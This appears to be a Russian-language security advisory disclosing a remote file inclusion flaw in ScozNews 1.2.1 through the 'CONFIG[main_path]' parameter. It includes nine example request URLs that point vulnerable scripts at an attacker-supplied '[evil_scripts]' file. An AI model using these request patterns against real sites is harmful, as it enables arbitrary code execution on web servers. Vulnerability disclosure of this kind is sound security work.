Хакер #305. Многошаговые SQL-инъекции
Программа: ScozNews 1.2.1, возможно другие версии.
Уязвимость позволяет удаленному пользователю выполнить произвольный код на
целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "CONFIG[main_path]" в различных сценариях. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для
удачной эксплуатации уязвимости опция "register_globals" должна быть включена.
Пример:
http://www.site.com/[news_path]/sources/functions.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/template.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/news.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/help.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/mail.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_cats.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_edit.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_import.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_templates.php?CONFIG[main_path]=[evil_scripts]